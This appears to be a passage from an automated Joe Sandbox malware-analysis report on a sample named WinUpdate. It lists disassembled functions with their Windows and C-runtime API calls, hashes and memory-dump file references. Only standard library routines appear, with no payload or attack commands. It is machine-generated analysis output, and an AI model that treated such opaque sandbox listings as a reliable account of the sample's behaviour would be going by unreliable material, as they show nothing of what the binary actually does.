                                                                                                                                                                                                                                                                                                • Instruction ID: 3760a471c62f38a5fba8c74bb0b1a68b29c1e0ca39723ecaa6d5213a38e733d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd21c1a92f3b7df69a89b06200a1028984415a8e6ddb9e35e6d1f10bba0f3523
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93219DB1EC121CBFEB219BA19C8CFFB76ACEB08385F8049A5F505D6140D6708E858B70
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1001AE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1001A6E8
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 1001A763
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 1001A77E
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1001A7A4
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7C3
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7FC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                • Instruction ID: caa66828d063c4f57f6ca3a5c54d23115575f1b669959d2329a9049d7f1fcf44
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A5152719002499FDB10CFA4CC85BDEBBF5EF0A310F15416AE955EB291D730D992CBA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02E69C07,?,00000000,?,00000000,00000000), ref: 02E694D4
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 02E6954F
                                                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 02E6956A
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02E69590
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,02E69C07,00000000,?,?,?,?,?,?,?,?,?,02E69C07,?), ref: 02E695AF
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,02E69C07,00000000,?,?,?,?,?,?,?,?,?,02E69C07,?), ref: 02E695E8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 82060c8d4320f9d8f3ec22cf280204eb8e2308cea7882b25fc1c4dc0a2c7a7b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 6337c832aeec1a487034d5f36107f26cc15b66c80c8c5bee82b750ad95c5a320
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82060c8d4320f9d8f3ec22cf280204eb8e2308cea7882b25fc1c4dc0a2c7a7b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6651F670EC02499FCB10CFA8D899AFEBBF9EF08344F14955AE551E7282D7309951CBA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 02E6339B
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 02E633A3
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 02E63431
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02E6345C
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 02E634B1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fed59645909b5dd8a197f84acc4369cc2f945b0d8e1eb1830d17578c429ae73
                                                                                                                                                                                                                                                                                                • Instruction ID: a0d84208be0286efd35be7cd920ca30b57b1b971eac0e2e263c0fb6d268126db
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fed59645909b5dd8a197f84acc4369cc2f945b0d8e1eb1830d17578c429ae73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4941B334EC02089BCF10DF68C848AAEFBB6AF45BA8F14D1D5E8159B651D731EA15CF90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CCFE: _free.LIBCMT ref: 1001CD27
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CD88
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CD93
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CD9E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CDF2
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CDFD
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CE08
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CE13
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                                                                                • Instruction ID: 240818be63ccc3dc83c97ca6d82296bdbd890e81bd7557c088d8b4c1d65aa4e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C112C75540B08EAD520EBB0CC46FCB779DDF04B00F880D1DB69D6E052DA79F9859B91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E69221: _free.LIBCMT ref: 02E6924A
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E692AB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E692B6
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E692C1
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E69315
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E69320
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E6932B
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E69336
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                                                                                                                                                                                                                                                                                • Instruction ID: 7fdbbf413bc108e7443d33767df34234deabc680f0658f3f63eab6218bbe2911
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0116D316C0B08EAD630BBB0EC4DFEB7B9E9F04780F849824B69D66053DA36B5444A51
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000CFB0
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1000CFBE
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000CFD7
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000D029
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                • Opcode ID: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                                                                                • Instruction ID: 42fd6e2f6c8fd24065b669452523f428359482c8d7ddecb3c68a8dbe90369287
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E012836609B2A6EF31197749CC9F2B26D8DB457F1B30022AF928850F8FE115C475150
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B248
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B2CE
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1001B3C8
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 1001B3D5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 1001B3DE
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 1001B403
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ed5a0c60fab733cb76eb0d012d0445d28864b3239f3e6487cb8682899a93c8b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE51F372600A16ABEB15CFA4CC81EAF37E9EF44690F524229FD14DE180EB74EDD1C660
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,02E66FFD,00000000,?,?,?,02E68A72,?,?,00000100), ref: 02E6887B
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02E68A72,?,?,00000100,5EFC4D8B,?,?), ref: 02E68901
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02E689FB
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02E68A08
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02E65702
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02E68A11
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02E68A36
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 44aa41605a9a9842301ae1d922800b7340a2888612dc82e1f612fecfe50c1a6d
                                                                                                                                                                                                                                                                                                • Instruction ID: f406a1aa97ddb297b246a99907b31dc393ff47ca32a77607fb69864eb9f04b56
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44aa41605a9a9842301ae1d922800b7340a2888612dc82e1f612fecfe50c1a6d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6751D0726D0216ABDF25CE64CC4CEBB77AAEB40798F549629FC04D6140EB35DC58CA90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E61607
                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 02E6161D
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,02E6190E,?,?,00000000,?,00000000), ref: 02E61643
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,02E6190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02E6165A
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,02E6190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 02E61661
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,02E6190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02E61686
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1eea6e6a7a74def6fe7a3c32034b1260bd1dbf04d9fc461f2549e209325927b4
                                                                                                                                                                                                                                                                                                • Instruction ID: 1c891c2e72227a6a2126cc8c2b046e26b7bc25d559e64f667126aced2d713d42
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eea6e6a7a74def6fe7a3c32034b1260bd1dbf04d9fc461f2549e209325927b4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D321FB36A80204ABD7059F54DC89EFE77BAEF88750F14941AF504AF280DB30A5418B65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 02E61038
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02E6104B
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02E61061
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 02E61075
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 02E61090
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 02E610B8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4508375c5082d4456bfeee86fc8107dd770060101fd0eea7e551837be8055e1e
                                                                                                                                                                                                                                                                                                • Instruction ID: b147fd0e9897654a9f9a7f68bba0acfd04b85a3af3ba4a58fb9b14e74f256363
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4508375c5082d4456bfeee86fc8107dd770060101fd0eea7e551837be8055e1e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121A63598031C9BCF61DA61DC4CEEB373AEF84398F108555E869AB2A1DB309A95CF40
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,02E63518,02E623F1,02E61F17), ref: 02E63864
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02E63872
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02E6388B
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,02E63518,02E623F1,02E61F17), ref: 02E638DD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fe5453eb13fe4820003d884a1097a1eea5f3db47987232b5c6681fa4c19e8706
                                                                                                                                                                                                                                                                                                • Instruction ID: 81eedef5ee3bf8d5f73f6fa18e0438f8f13d8364a6bc912256fb0d2efa4ac97d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe5453eb13fe4820003d884a1097a1eea5f3db47987232b5c6681fa4c19e8706
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A901F733FC87125EA664367B7C8CAB72B56EB46FF9720A2F9F010950D0EF2148559740
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,1000310F,1000E403,1000310F,?,?,1000FF84,?,1000310F,?), ref: 10016A80
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016AB3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016ADB
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AE8
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AF4
                                                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 10016AFA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
